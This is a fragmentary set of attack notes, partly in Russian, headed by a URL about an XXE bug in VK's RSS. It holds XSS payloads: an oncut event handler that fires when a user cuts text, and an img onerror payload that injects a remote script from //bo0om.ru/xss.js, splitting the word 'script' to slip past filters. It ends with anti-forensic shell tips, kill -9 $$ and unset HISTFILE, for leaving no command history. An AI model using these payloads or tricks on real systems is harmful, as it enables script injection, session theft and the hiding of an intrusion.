
https://bo0om.ru/vk-xxe-rss
Size: a a a












<q/oncut=alert()>X
oncut сработает, если пользователь попытается вырезать содержимое, т.е. выделет текст и нажмет CTRL+X. 
<img src onerror="(function(u){var d=document,s=d.createElement('scri'+'pt');s.src=u;(d.head||d.documentElement).appendChild(s);s.parentNode.removeChild(s);}('//bo0om.ru/xss.js'));">


kill -9 $$ unset HISTFILE (с пробелом в начале), чтобы не писать в историю вовсе.
